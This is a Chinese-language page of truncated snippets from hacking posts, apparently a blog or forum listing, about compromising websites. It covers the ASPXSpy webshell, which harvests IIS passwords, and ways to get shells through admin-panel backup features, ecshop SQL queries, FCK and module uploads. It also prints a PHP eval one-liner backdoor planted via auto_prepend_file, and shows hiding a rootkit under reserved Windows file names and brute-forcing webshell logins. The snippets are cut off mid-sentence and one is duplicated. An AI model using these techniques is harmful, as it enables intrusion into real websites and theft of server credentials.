aspxspy的大马的查看站点做限制
先介绍一下: 1.开发环境VS2008 + C#,兼容FrameWork1.1/2.0,基本实现代码分离,CSS方便参考了phpspy。 2.密码为32位MD5加密(小写) 默认为 admin. 3.全部采用POST方式提交数据,增强了隐蔽性。 4.增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。 5.增加了对指定文件的搜索功能。 6.修正了一些数据库操作的BU...
先介绍一下: 1.开发环境VS2008 + C#,兼容FrameWork1.1/2.0,基本实现代码分离,CSS方便参考了phpspy。 2.密码为32位MD5加密(小写) 默认为 admin. 3.全部采用POST方式提交数据,增强了隐蔽性。 4.增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。 5.增加了对指定文件的搜索功能。 6.修正了一些数据库操作的BU...
这其实算是一种拿shell方法吧!!跟大家分享一下~~ 很多时候我们进入网站后台,发现有备份功能,但并不能修改我们需要备份的文件地址,这个方法可以解决这类难题。。。高手就飞过吧~~ 过程: 1、发现可以备份,但不能修改成我们需要备份的文件 因为都隐藏了 我们随便填一下,是可以备份成.asp的 那我们先上传一个小马上去 然后,我们进行抓包备份,获取备份数据包 抓到数据包了 复制到记事本...
天群里一个鸟人丢个后台叫帮忙拿shell。一看是FCK,就各种去弄了...结果无功而返,PHP语言。过程就不说了,不是重点.后来在前台打开各种链接以及配合后台查看发现他的关于我们\招贤纳士只能的页面是独立的php页面.这就好办了。写个一句话即可。至于怎么写,我这就扯下。 看代码: <div id="con660"> <div> <h4>业务领域</h4&g...
很好很给力,上图: 下载:dede
1.把error_log设置到web目录 ~例如hackxl.php 2.auto_prepend_file设为一句话 ~比如设为<?php eval($_REQUEST[#]);?> 3.然后访问任意php php文件后会因为找不到auto_prepend_file的文件而报错,而会产生报错;把<?php eval($_REQUEST[#]);?>写入了hackxl.ph...
今晚在搞个黑客站的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就再帖下,并说明用法! Set ObjS...
最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后,测试后台拿shell。 本人整理给自己看的,大家飘过就好。BY:黑猫 ecshop后台拿shell 个人总结七种方法 一、 系统==>数据库管理==>sql查询(可爆出物理路径): ==============创建表失败,导不出shell====================== show databases; u...
Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现: D:\wwwroot>copy rootkit.asp \\.\D:\\wwwroot\aux.asp 已复制 1 个文件。 D:\AspWebServer\wwwroot>dir 驱动器 D 中...
我测试的版本是V1.15 网上都是V1.13的 于是下载回来看了下 。 后台 点击模块管理--->分类模块-->添加模块 直接添加后缀为php或asp的 都可以 内容就是马的内容。 马地址 在admin\tpls\tpls\main\green\class目录下
前一阵发表的自动循环机破解无返回错误的一句话,大家可能有很多疑虑,这次给大家显示一个彻底通杀的办法。 先来看看一款PHP shell,如图: 这款shell输入错误密码没有返回错误信息,在登录页面里找关键字也不可以爆破,难道真的没办法啦~下面就来演示下 先用抓包工具抓一下包,可以看到是post提交方式 把抓到的包填写到自动循环机里,并执行一下看下返回信息是不是200 设置上字典文件,这里我们把po...